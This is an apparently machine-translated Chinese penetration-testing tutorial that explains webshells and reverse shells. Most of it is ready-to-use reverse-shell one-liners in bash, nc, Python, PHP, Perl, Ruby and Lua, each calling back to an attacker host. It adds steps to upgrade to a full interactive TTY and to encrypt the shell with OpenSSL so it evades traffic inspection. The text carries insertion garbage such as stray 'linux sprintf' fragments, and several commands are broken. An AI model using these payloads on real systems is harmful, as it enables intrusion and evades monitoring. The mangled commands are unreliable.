哪些是shell
shell是滲透中常用的名詞,像getshell,webshell,大跌shell等等,都和shell相關。
百度百科解釋的shell:
在電腦科學中,Shell也稱殼(拿來區別於核),是指「提供使用者操作界
面」的軟體(命令解析器)。它類似於DOS下的和後來的
cmd.exe。它接收用戶命令,之後調用相應的應用程式。
簡單說使用者透過殼存取作業系統內核的服務,也就是由殼到內核,執行系統指令。
getshell:取得到目標的命令執行權限
webshell:指網站側門linux 核心 sprintf,透過web服務進行指令執行
大跌shell:把命令列的輸入輸出轉移到其它主機
為何要大跌shell
1、webshell下執行指令不交互,為了便捷加殼或其它操作必需要大跌shell。
2、反彈shell相當於新增一個側門,當webshell被發覺刪掉後權限不會遺失。
常用linux大跌shell的方法
使用whereis指令去決定目標支援的回呼技巧。
whereis nc bash python php exec lua perl ruby
##bash大跌shell
bash回呼是實戰中用的最多的方式
nc -lvp 9999 bash -i >& /dev/tcp/ip/port 0>&1
把指令拆開剖析:
1、bash-i代表在本地開啟一個bash
2、/dev/tcp/是Linux中的一個特殊設備,打開這個文件就相當於發出了一個socket調用,構建一個socket聯接
3、>&旁邊跟上/dev/tcp/ip/port這個文件代表將標準輸出和標準錯誤輸出重定向到這個文件,也就是傳遞到遠端vps
4、遠端vps開啟對應的連接埠去竊聽,都會接收到這個bash的標準輸出和標準錯誤輸出。
nc大跌shell
須要目標主機安裝了nc
nc ip port -e /bin/sh
使用其他版本的nc
nc.traditional ip port -e /bin/sh
配合命名管线进行大跌:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
python大跌shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3
0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程
接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。
php大跌shell
须要php关掉safe_mode选项,才可以使用exec函数。
使用php的exec函数执行方式1大跌shell的命令
php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
使用php的fsockopen去大跌shell
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
其它大跌方式
exec大跌
0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
perl大跌
perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby大跌
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
lua大跌
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i &3 2>&3');"
获取一个完全交互shell
通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。
一般存在以下缺点
因而有必要去获取一个完全交互的shell。
1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
隐藏
运行完后
2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:
stty raw -echo fg #将后台运行或挂起的任务切换到前台运行
3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。
reset export SHELL=bash export TERM=xterm-256color stty rows 54 columns 104
SSL流量加密
部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。
因而须要将原始流量使用openssl加密,绕开流量审计设备。
1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2、vps使用OpenSSL窃听一个端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
3、目标主机执行回调加密shell
mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
大跌成功,成功接收到ssl流量加密的shell。
參考連結
以上是深入了解 shell:滲透中常用名詞解析及應用場景的詳細內容。更多資訊請關注PHP中文網其他相關文章!